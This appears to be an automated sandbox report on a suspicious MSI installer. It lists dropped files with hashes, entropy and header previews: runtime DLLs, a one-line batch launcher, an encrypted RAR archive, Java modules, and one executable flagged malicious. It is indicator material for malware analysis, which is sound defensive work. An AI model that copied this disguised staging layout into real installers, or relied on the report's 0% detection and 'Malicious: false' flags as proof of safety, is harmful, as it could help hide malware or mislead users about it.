Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........D..,....&"...&.R4...D.....P.........................................E.....r}N...`... .......................................D.0-....D.hX...PE.......?.......M.H'...`E..e............................>.(.....................D.`............................text....P4......R4.................`..`.data....3...p4..4...V4.............@....rdata...&....4..(....4.............@..@.pdata........?.......?.............@..@.xdata..8{....A..\|...TA.............@..@.bss..........D..........................edata..0-....D.......C.............@..@.idata..hX....D..Z....C.............@....CRT....`....0E......XD.............@....tls.........@E......ZD.............@....rsrc........PE......\D.............@....reloc...e...`E..f...`D.............@..B................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\avutil-58.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1089600
Entropy (8bit):	6.535744457220272
Encrypted:	false
SSDEEP:	24576:NFUq9wHzADwiB0Bm3k6gz0sA+wLDZyoFNRsKYw:TUdMDwIgm3kpzsNpyoFDsKYw
MD5:	3AAF57892F2D66F4A4F0575C6194F0F8
SHA1:	D65C9143603940EDE756D7363AB6750F6B45AB4E
SHA-256:	9E0D0A05B798DA5D6C38D858CE1AD855C6D68BA2F9822FA3DA16E148E97F9926
SHA-512:	A5F595D9C48B8D5191149D59896694C6DD0E9E1AF782366162D7E3C90C75B2914F6E7AFF384F4B59CA7C5A1ECCCDBF5758E90A6A2B14A8625858A599DCCA429B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........f..X.....&"...&.2...b......P......................................... ......?....`... ......................................0 .xC.... ....... .h.......@>...x..H'.... ............................. Z..(..................... .P............................text....1.......2..................`..`.data........P.......6..............@....rdata...,...`.......8..............@..@.pdata..@>.......@...f..............@..@.xdata...K.......L..................@..@.bss......... ...........................edata..xC...0 ..D..................@..@.idata........ ......6..............@....CRT....`..... ......N..............@....tls.......... ......P..............@....rsrc...h..... ......R..............@....reloc........ ......V..............@..B................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57488
Entropy (8bit):	6.382541157520703
Encrypted:	false
SSDEEP:	768:eQ6XULhGj8TzwsoeZwVAsuEIBh8v6H3eQdFyN+yghK3m5rR8vSoQuSd:ECVbTGkiE/c+XA3g2L7S
MD5:	71F796B486C7FAF25B9B16233A7CE0CD
SHA1:	21FFC41E62CD5F2EFCC94BAF71BD2659B76D28D3
SHA-256:	B2ACB555E6D5C6933A53E74581FD68D523A60BCD6BD53E4A12D9401579284FFD
SHA-512:	A82EA6FC7E7096C10763F2D821081F1B1AFFA391684B8B47B5071640C8A4772F555B953445664C89A7DFDB528C5D91A9ADDB5D73F4F5E7509C6D58697ED68432
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l............uU.....x.....x.....x....{...........ox....ox9....ox....Rich...........................PE..d......d.........."......f...N......p).........@....................................2.....`.....................................................................P........(......d.......T...............................8............................................text....e.......f.................. ..`.rdata...6.......8...j..............@..@.data...............................@....pdata..P...........................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..d...........................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\iwhgjds.rar

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	401806
Entropy (8bit):	7.999608298273077
Encrypted:	true
SSDEEP:	12288:+o2684lgnF+oFxo0TynyD2f02bm4DQIGIJ:n6qgn0oXoK12bzFX
MD5:	5B961725FE5698CC5FC5B26288556FC2
SHA1:	E2B4933B2311DD64EDB6DDC39719BA8C523BE909
SHA-256:	37DE2D0689662BAB8D7E97D810349681B01B8DC004F4EB17BB0ED5C0B9E92BEC
SHA-512:	671E1F6ED1DD6B27D724CBF68AABB03AA01D714C12B117A09B4EFBB7269B7C1E87F3FC189108756559C505E60D336470476596232B272BBCA4FE6640576B5AD2
Malicious:	false
Preview:	Rar!........!......s.&D.t..Y.uF_.M...11.s/Ot.....>....x.DG.z#9$....&p"...E...A..w\|.S"o.X2.%....KFU.l.]..,c-.,.$..9..x...N90...6s._..S.....9.%..........=O.Nb..`.>.`W3.'{.gVx..`.>$..S.2_.i&.b.`eLk]P.........i........Dx..7.wX.c.ro.)&.....l.Bs.r....6A:...2:~W.5.r...).0.N.......T..8A.2b..58.\|.i.rR.V........eJNmq..g..)..(.Yq._Ln....^.y......Q...4...5..0....SH..PUV^=....{2t..M5%..qx..`..v...!p\u.bz.&'z...H.2...iE.#T..x...5tl.....+C.r...g5.......2...~............).....0ftD..#T.w..O.....O..F........M.....\|I.<....P...).p-..L9s.......F..E...4l.2`.B..........0.E..C..y;{...ROZ.DV..m....(.+..DX.7.&..x....<.<Q..(..f.w-.I.gee.!k9".....[~...Dl..>d=._=.....#.Q.......}...'..f.U.U......F.`9hU.fP^{r.......Sh.i..kOP ...j..J.!.O.3....3..'..B.Q...A\|b8....k-.v!swU..r.}.3j]>M.@....3....fKh.......H...=.^..x...^-..@.$'QN.7.KYS..M.......D...8.R....j..Y..H.q-.2.......,.E..7.pG......D....;..t.m..q.F...<..j.K...t#L..i.Z.n.Z.j....6!..@....q..Ext6.J.9..j.........V...t\|.

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\msvcp140.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	566704
Entropy (8bit):	6.494428734965787
Encrypted:	false
SSDEEP:	12288:M/Wn7JnU0QUgqtLe1fqSKnqEXG6IOaaal7wC/QaDWxncycIW6zuyLQEKZm+jWodj:yN59IW6zuAQEKZm+jWodEEY1u
MD5:	6DA7F4530EDB350CF9D967D969CCECF8
SHA1:	3E2681EA91F60A7A9EF2407399D13C1CA6AA71E9
SHA-256:	9FEE6F36547D6F6EA7CA0338655555DBA6BB0F798BC60334D29B94D1547DA4DA
SHA-512:	1F77F900215A4966F7F4E5D23B4AAAD203136CB8561F4E36F03F13659FE1FF4B81CAA75FEF557C890E108F28F0484AD2BAA825559114C0DAA588CF1DE6C1AFAB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y...................Z.........O.....O.....O.....O.....O.....O.6....O.....Rich...........................PE..d...%\|.a.........." .....<...\.......)...................................................`A.........................................5..h...(...,............p...9...~...'......0.......T...............................8............P...............................text....;.......<.................. ..`.rdata..j....P.......@..............@..@.data...`:...0......................@....pdata...9...p...:...6..............@..@.rsrc................p..............@..@.reloc..0............t..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35656
Entropy (8bit):	6.370522595411868
Encrypted:	false
SSDEEP:	768:ixmeWkfdHAWcgj7Y7rEabyLcRwEpYinAMx1nyqaJ:pXUdg8jU7r4LcRZ7Hx1nyqa
MD5:	D3CAC4D7B35BACAE314F48C374452D71
SHA1:	95D2980786BC36FEC50733B9843FDE9EAB081918
SHA-256:	4233600651FB45B9E50D2EC8B98B9A76F268893B789A425B4159675B74F802AA
SHA-512:	21C8D73CC001EF566C1F3C7924324E553A6DCA68764ECB11C115846CA54E74BD1DFED12A65AF28D9B00DDABA04F987088AA30E91B96E050E4FC1A256FFF20880
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........D..D..D..M.3.J......F......W......N......G......F..D..l......A..D.........E...._.E......E..RichD..................PE..d................"....#.2...4......`7.........@..........................................`..................................................b..,....................d..H'......<....Z..p...........................`Y..@............P...............................text....1.......2.................. ..`.rdata..H"...P...$...6..............@..@.data...H............Z..............@....pdata...............\..............@..@.rsrc................`..............@..@.reloc..<............b..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\suriqk.bat

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	22
Entropy (8bit):	3.879664004902594
Encrypted:	false
SSDEEP:	3:mKDDlR+7H6U:hOD6U
MD5:	D9324699E54DC12B3B207C7433E1711C
SHA1:	864EB0A68C2979DCFF624118C9C0618FF76FA76C
SHA-256:	EDFACD2D5328E4FFF172E0C21A54CC90BAF97477931B47B0A528BFE363EF7C7E
SHA-512:	E8CC55B04A744A71157FCCA040B8365473C1165B3446E00C61AD697427221BE11271144F93F853F22906D0FEB61BC49ADFE9CBA0A1F3B3905E7AD6BD57655EB8
Malicious:	false
Preview:	@echo off..Start "" %1

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\swresample-4.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	158968
Entropy (8bit):	6.4238235663554955
Encrypted:	false
SSDEEP:	1536:izN/1rbQ+rTccg/Lla75jjVBzYCDNzuDQr5whduOd7EKPuh9Aco6uAGUtQFUzcnX:8N/FQ+rejlaFhdrXORhjD6VGUtQWk
MD5:	7FB892E2AC9FF6981B6411FF1F932556
SHA1:	861B6A1E59D4CD0816F4FEC6FD4E31FDE8536C81
SHA-256:	A45A29AECB118FC1A27ECA103EAD50EDD5343F85365D1E27211FE3903643C623
SHA-512:	986672FBB14F3D61FFF0924801AAB3E9D6854BB3141B95EE708BF5B80F8552D5E0D57182226BABA0AE8995A6A6F613864AB0E5F26C4DCE4EB88AB82B060BDAC5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........O.....&"...&.h..........P.....................................................`... ...................................... .......0..T....`..........X....E..H'...p..................................(...................02...............................text....f.......h..................`..`.data................l..............@....rdata...Q.......R...n..............@..@.pdata..X...........................@..@.xdata..............................@..@.bss.....................................edata....... ......................@..@.idata..T....0......................@....CRT....X....@......................@....tls.........P......................@....rsrc........`......................@....reloc.......p......................@..B................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\swscale-7.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	707200
Entropy (8bit):	6.610520126248797
Encrypted:	false
SSDEEP:	12288:hTl8xt5jEuhuoWZz8Rt5brZcXVEZMbYwepVQ0G6ddTD8qevJMLf50555555555mj:hZ8xt5jEuhuoWZz8Rt5brZcXVEZMbYJz
MD5:	1144E36E0F8F739DB55A7CF9D4E21E1B
SHA1:	9FA49645C0E3BAE0EDD44726138D7C72EECE06DD
SHA-256:	65F8E4D76067C11F183C0E1670972D81E878E6208E501475DE514BC4ED8638FD
SHA-512:	A82290D95247A67C4D06E5B120415318A0524D00B9149DDDD8B32E21BBD0EE4D86BB397778C4F137BF60DDD4167EE2E9C6490B3018031053E9FE3C0D0B3250E7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........-.....&"...&............P.....................................................`... ......................................P.......`..........x....P......8...H'......................................(....................c..`............................text...(...........................`..`.data...............................@....rdata...s.......t..................@..@.pdata.......P...0...&..............@..@.xdata...9.......:...V..............@..@.bss.....................................edata.......P......................@..@.idata.......`......................@....CRT....`....p......................@....tls................................@....rsrc...x...........................@....reloc..............................@..B................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\una_front\classes.jsa

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	12124160
Entropy (8bit):	4.1175508751036585
Encrypted:	false
SSDEEP:	49152:opbNLHjtBKapOZoWPQ8MQvfyf3t+WpskQS+ZSZmpPwoe5GOSwleJiXACPQDk8p8j:o9NDU1eB1
MD5:	8A13CBE402E0BBF3DA56315F0EBA7F8E
SHA1:	EE8B33FA87D7FA04B9B7766BCF2E2C39C4F641EA
SHA-256:	7B5E6A18A805D030779757B5B9C62721200AD899710FF930FC1C72259383278C
SHA-512:	46B804321AB1642427572DD141761E559924AF5D015F3F1DD97795FB74B6795408DEAD5EA822D2EB8FBD88E747ECCAD9C3EE8F9884DFDB73E87FAD7B541391DA
Malicious:	false
Preview:	.................*.\.....................................+................................Ol.....................................">.............................d..3......................A.......@...... t.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................(#......(............... ................Java HotSpot(TM) 64-Bit Server VM (15.0.1+9-18) for windows-amd64 JRE (15.0.1+9-18), built on Sep 15 2020 14:43:54 by "mach5one" with unknown MS VC++:1925....................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\una_front\java.datatransfer.jmod

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Java jmod module version 1.0
Category:	dropped
Size (bytes):	51389
Entropy (8bit):	7.916683616123071
Encrypted:	false
SSDEEP:	768:GO5DN7hkJDEnwQm0aCDOdC4Lk1eo8eNEyu/73vVjPx5S+3TYWFwSvZt6xdWDvw:GO5h7hkREnyvo8QBuDNjfvD1/3vw
MD5:	8F4C0388762CD566EAE3261FF8E55D14
SHA1:	B6C5AA0BBFDDE8058ABFD06637F7BEE055C79F4C
SHA-256:	AAEFACDD81ADEEC7DBF9C627663306EF6B8CDCDF8B66E0F46590CAA95CE09650
SHA-512:	1EF4D8A9D5457AF99171B0D70A330B702E275DCC842504579E24FC98CC0B276F8F3432782E212589FC52AA93BBBC00A236FE927BE0D832DD083E8F5EBDEB67C2
Malicious:	false
Preview:	JM..PK.........n/Q................classes/module-info.classeP.N.0..../.$...pAM.D.p..!!..X...m.d'.....P7...biw..Y.?._...pM.m..X.q..2.D8o...o.0.J.s...,...".'..>..F..r..M..G.L......!.je.BG....:v.;..a@...Y...3..?.Y....\.m.).CBwn......'.N..+G+^#.j...R.A..qV.1o...p.....\|._.-N$.!.;X....\|....G......qi.W{PK...^0.........PK.........n/Q............-...classes/java/awt/datatransfer/Clipboard.class.X.w.W....c...-.Ii...#.P..........@(`.......3.....R...........<....h..W.z......=.=~....l..DN..............;y.@7..#....2.P.._.WR.b.Km..f......9w1T...A.....d..b.r.Ie.Gq,..U+.kcC.be..eTe......K3.usU.2...Pe.4T.aYz....>!..q..3.dL.Q..fh/#..P.t.;.f,.."..7..v.(..K7}.2nZ;.Mg..OuzU..c.....!wR.xz....7...tG..d.ED..3...fs.{n\...x...r.!.#X.6.Ke.v........1n.P......#..P...J....)^.dt....k...k...F5...e$.d...=~Do.t.2....KX....B.#Ha..U2n.j...+fh&....&.zk,.....>...aQ......kj...:.h.Q.uTv.B ......N......r'..x..D.4.`k 76fZ....fG..#.....7.4.:w..6....#...x..>lfh.B'.....'l..V.....5..H..

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\una_front\java.instrument.jmod

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Java jmod module version 1.0
Category:	dropped
Size (bytes):	41127
Entropy (8bit):	7.961466748192397
Encrypted:	false
SSDEEP:	768:L0xH2Z5C7/c8GqFsHWShYYptTpmPSB4gTQSq4Yz1jHoAsbjX:wxH66/crqiH3tTVTsSVYz1jIAsfX
MD5:	D039093C051B1D555C8F9B245B3D7FA0
SHA1:	C81B0DAEDAB28354DEA0634B9AE9E10EE72C4313
SHA-256:	4A495FC5D119724F7D40699BB5D2B298B0B87199D09129AEC88BBBDBC279A68D
SHA-512:	334FD85ACE22C90F8D4F82886EEF1E6583184369A031DCEE6E0B6624291F231D406A2CEC86397C1B94D535B36A5CF7CB632BB9149B8518B794CBFA1D18A2478F
Malicious:	false
Preview:	JM..PK.........n/Q................classes/module-info.classU.M..0..../..........LL...A.$.t.\x..e,U.N.N..7o.....=B+..,.@..:.`.....`....L.,.".B.M......:...._..uBGf.5.M..g..."..8K\..B.".z..\|=6.=1.KB..v,.yJ0/......[.r..OU`....Q}...kP.94oh...b..K{...].'PK........#...PK.........n/Q............2...classes/java/lang/instrument/ClassDefinition.class.SMo.@.}.8q.4M.@.h..b;... ..d.RP$.c...#g...#@.....@.G..........7o.......@.-..J.T.eT..'.......tt.=.P9.C_t.J.5... ...Y...z\|.(..TE...e.....(.......v?pg....<...I.1.:....H.U...1.)..p...P.......\|...04..Q..2...%..8~.......#..p"...n..<.Uq..=..:.c..1.2...x.o.w..#....^?q.I..:..Y...6...N..c..>2.k.U...L..&V.H...%....y...[.~GJ...B/M......%...t....+.I.E....H..}....m..j_..8C...:.n...(*..z..Z.Q...$....a.}..T.xW.$....52...T.o..mSL_~.L.FM....W.z.I.]....)..e.....A..$..xH...Td...0i..."...0X....PK..X..~........PK.........n/Q............7...classes/java/lang/instrument/ClassFileTransformer.class.S.n.@.=.8.M.n..b^-/..G..

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\una_front\java.logging.jmod

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Java jmod module version 1.0
Category:	dropped
Size (bytes):	113725
Entropy (8bit):	7.928841651831531
Encrypted:	false
SSDEEP:	3072:6jB5A+VPT8IdtpHAUfEzhLpIrxbt2rlnH6:6ZRTPHgU2pItshH6
MD5:	3A03EF8F05A2D0472AE865D9457DAB32
SHA1:	7204170A08115A16A50D5A06C3DE7B0ADB6113B1
SHA-256:	584D15427F5B0AC0CE4BE4CAA2B3FC25030A0CF292F890C6D3F35836BC97FA6D
SHA-512:	1702C6231DAAB27700160B271C3D6171387F89DA0A97A3725B4B9D404C94713CB09BA175DE8E78A8F0CBD8DD0DD73836A38C59CE8D1BD38B4F57771CF9536E77
Malicious:	false
Preview:	JM..PK.........n/Q................classes/module-info.classuQ.N.1.=W......n\1.D.5$&....T...2%....\..~..3(......9.6...o....%..:L...x.=..p..L.......".Gm........Z9.R+...}x..$.Y,,..-..z..{.v.K..:9m[.dl....Q#t..F$:5c..h..^x".8 \N..A!....O....@.0.Z....p]......0_(.mB...=.J..<.k"4....g<......M$,....:Kz\|..^.........8q..{...}.G....p.S.W...l.M.....PK..R...).......PK.........n/Q................classes/java/util/logging/ConsoleHandler.class}S[o.A...KW..jk.....jy...K.b.R.mH\|.......2.K....h...G..,..K...s..r......7....d.u....C...y3..j..2...1..!wx..2T:.T...b.^..`.D[...0....n.cXy#C..e...=.E.....]..%L..<x.....W........z..u.s..a.e..Zq..-.E@n.!..)....F...\.E...<...[.;W..t.i%.mT".w.x..(.m,...r.....tZ..vPepFI_...D..b..0.U...S;....XP.@..C.#Cq..}aNy_..ZG...q#m<;..g2b.]"..Y.....[7."+..#"wOtb..-..."..@..(.>Y0......C.h...?.~..8A.Mp.....N....Z$ .E...."o.E.uz3;..m.P.z.....7...?.'.q>...2mN.gLv...q1..[}..@~..M.....K..sS.....PK....0w........PK.........n/Q............,...classes/ja

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\una_front\java.management.jmod

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Java jmod module version 1.0
Category:	dropped
Size (bytes):	896846
Entropy (8bit):	7.923431656723031
Encrypted:	false
SSDEEP:	12288:3xz+ej0yUGnip25kAyyrAm0G4hcpbLIWFWb4YNlgWUz4u5cnLXlAVz/Q+9Ec8zCU:3cZpcryy8mp4hpSxWUQuV//yDXX
MD5:	C6FBB7D49CAA027010C2A817D80CA77C
SHA1:	4191E275E1154271ABF1E54E85A4FF94F59E7223
SHA-256:	1C8D9EFAEB087AA474AD8416C3C2E0E415B311D43BCCA3B67CBF729065065F09
SHA-512:	FDDC31FA97AF16470EA2F93E3EF206FFB217E4ED8A5C379D69C512652987E345CB977DB84EDA233B190181C6E6E65C173062A93DB3E6BB9EE7E71472C9BBFE34
Malicious:	false
Preview:	JM..PK.........n/Q................classes/module-info.class.S.N.A.=-.............^PQP4F..\|..]{.........S\|...(cu/..i.d.z...[....'.M\|`.M.GrI.).1.4...8...V.b.EE.Rg...zV.K......Os.W.S?.e.GY.Q`.od..d..Zf....2>.B.29.D.3L7...M&....8.;..2...}..n..n.g...S. ?..._V..Q..9mBo0L..~dD.t.c.ric..2r5qLvr..V....Sm..I}.}.a..Od$2e..M.v.m..w....L..s.C.;...#.f..Ln.......5..9.2....5......P......M.$V.\|;...'mw.Vl.2....D..1%.l.a..o...O....!.......h...9V.L.x..?..n]/.6......iVe..{.4.K..s.[....y..\|2....3,`.a.....H69.a.;09.5K.C....a_.G.`Jm...ER......9I.D.n...Wp........%..WI...tf..pg5..SN.8y..Y'.:9....U.pq.....}.]X..aE....^t..x.l...^....m.#.......a."r.l.2..Lf).y.^.h..u....PK....N.i.......PK.........n/Q............0...classes/com/sun/jmx/defaults/JmxProperties.class.UMS#U.=.aH.4.4.....J2...h..6v.L2q.......tS.)F........\.....Y..h2...*...{.......w..8Ha.....p.C.c..C;..^+S...F.0..xNt....J5.$.b.og..9l.g....Q..k......"..I....b....-..^.n..<x..4.$pY.(..,\~.F..0...Z<`X[...(p...u^.

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\utest.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	639224
Entropy (8bit):	6.219852228773659
Encrypted:	false
SSDEEP:	12288:FgLcjQQPKZZK8aF4yBj3Fnx4DMDO8jalo:FggjQKuyDnxvOYaC
MD5:	01DACEA3CBE5F2557D0816FC64FAE363
SHA1:	566064A9CB1E33DB10681189A45B105CDD504FD4
SHA-256:	B4C96B1E5EEE34871D9AB43BCEE8096089742032C0669DF3C9234941AAC3D502
SHA-512:	C22BFE54894C26C0BD8A99848B33E1B9A9859B3C0C893CB6039F9486562C98AA4CEAB0D28C98C1038BD62160E03961A255B6F8627A7B2BB51B86CC7D6CBA9151
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*...D..D..D.....D.1J...D...@..D...G..D...A..D...E..D..E..D...E..D..E.O.D...A..D...D..D......D.....D...F..D.Rich..D.........PE..d.....-a.........." ...............................................................E..... .....................................................,.......@....p..xK..................`...T.......................(.......................(............................text............................... ..`.rdata..H=.......>..................@..@.data....H... ...@..................@....pdata..xK...p...L...J..............@..@.rsrc...@...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\vcruntime140.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98224
Entropy (8bit):	6.452201564717313
Encrypted:	false
SSDEEP:	1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:	F34EB034AA4A9735218686590CBA2E8B
SHA1:	2BC20ACDCB201676B77A66FA7EC6B53FA2644713
SHA-256:	9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:	D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%\|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\vcruntime140_1.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37256
Entropy (8bit):	6.297533243519742
Encrypted:	false
SSDEEP:	384:5hnvMCmWEKhUcSLt5a9k6KrOE5fY/ntz5txWE6Wc+Xf0+uncS7IO5WrCKWU/tQ0g:YCm5KhUcwrHY/ntTxT6ov07b4SwY1zl
MD5:	135359D350F72AD4BF716B764D39E749
SHA1:	2E59D9BBCCE356F0FECE56C9C4917A5CACEC63D7
SHA-256:	34048ABAA070ECC13B318CEA31425F4CA3EDD133D350318AC65259E6058C8B32
SHA-512:	CF23513D63AB2192C78CAE98BD3FEA67D933212B630BE111FA7E03BE3E92AF38E247EB2D3804437FD0FDA70FDC87916CD24CF1D3911E9F3BFB2CC4AB72B459BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D_.O.>...>...>...N...>..RK...>...F^..>...>..1>..RK...>..RK...>..RK...>..RK...>..RK2..>..RK...>..Rich.>..........................PE..d...)\|.a.........." .....:...6......`A....................................................`A.........................................l.......m..x....................n...#......<...(b..T............................b..8............P..X............................text...e9.......:.................. ..`.rdata.. "...P...$...>..............@..@.data... ............b..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..<............l..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\w32-pthreads.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	53576
Entropy (8bit):	6.371750593889357
Encrypted:	false
SSDEEP:	1536:ij2SSS5nVoSiH/pOfv3Q3cY37Hx1nI6q:GhSSntiH/pOfvAf3
MD5:	E1EEBD44F9F4B52229D6E54155876056
SHA1:	052CEA514FC3DA5A23DE6541F97CD4D5E9009E58
SHA-256:	D96F2242444A334319B4286403D4BFADAF3F9FCCF390F3DD40BE32FB48CA512A
SHA-512:	235BB9516409A55FE7DDB49B4F3179BDCA406D62FD0EC1345ACDDF032B0F3F111C43FF957D4D09AD683D39449C0FFC4C050B387507FADF5384940BD973DAB159
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.<.K.o.K.o.K.o.3.o.K.oK7.n.K.oK7so.K.oK7.n.K.oK7.n.K.oK7.n.K.o'9.n.K.o.K.o.K.o,6.n.K.o,6.n.K.o,6qo.K.o.K.o.K.o,6.n.K.oRich.K.o........PE..d....Q............" ...#.b...J.......f............................................../.....`............................................X...(...........................H'......8.......p...........................P...@...............@............................text...ha.......b.................. ..`.rdata..P,...........f..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..8...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\zlib.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	144200
Entropy (8bit):	6.592048391646652
Encrypted:	false
SSDEEP:	1536:GjxOs8gLeu4iSssNiTh9Yks32X3KqVy5SmBolzXfqLROJA0o1ZXMvr7Rn6dheIOI:I34iDsG5vm4bfqFKoDmr7h2MHTtwV6K
MD5:	3A0DBC5701D20AA87BE5680111A47662
SHA1:	BC581374CA1EBE8565DB182AC75FB37413220F03
SHA-256:	D53BC4348AD6355C20F75ED16A2F4F641D24881956A7AE8A0B739C0B50CF8091
SHA-512:	4740945606636C110AB6C365BD1BE6377A2A9AC224DE6A79AA506183472A9AD0641ECC63E5C5219EE8097ADEF6533AB35E2594D6F8A91788347FDA93CDB0440E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...&............P....................................................`... ......................................0..\|....@..8....p..................H'......................................(....................A..p............................text...............................`..`.data...............................@....rdata...W.......X..................@..@.pdata..............................@..@.xdata..............................@..@.bss......... ...........................edata..\|....0......................@..@.idata..8....@......................@....CRT....X....P......................@....tls.........`......................@....rsrc........p......................@....reloc..............................@..B................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Installer\{337A659D-79FE-4CED-9D18-362BBF6F3DBC}\icon_35.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows icon resource - 9 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
Category:	dropped
Size (bytes):	172242
Entropy (8bit):	3.920583934112822
Encrypted:	false
SSDEEP:	768:v+U57GB0uPJGGbN99NvQIUfGQ9zSN75NsnKcKgM90be1ERgygKEmw:GU5IH2II/+VyKkbIEgKEv
MD5:	38EADA415479858E73B3791D1A2F2A8A
SHA1:	53972C0D6830BB51F5E324D16675FFCE7AC67A69
SHA-256:	9E5A10145DD2A9AFB76B584FFCAEB50C1A7D5C87EA9F6ECB2A70CBF6B79F58B0
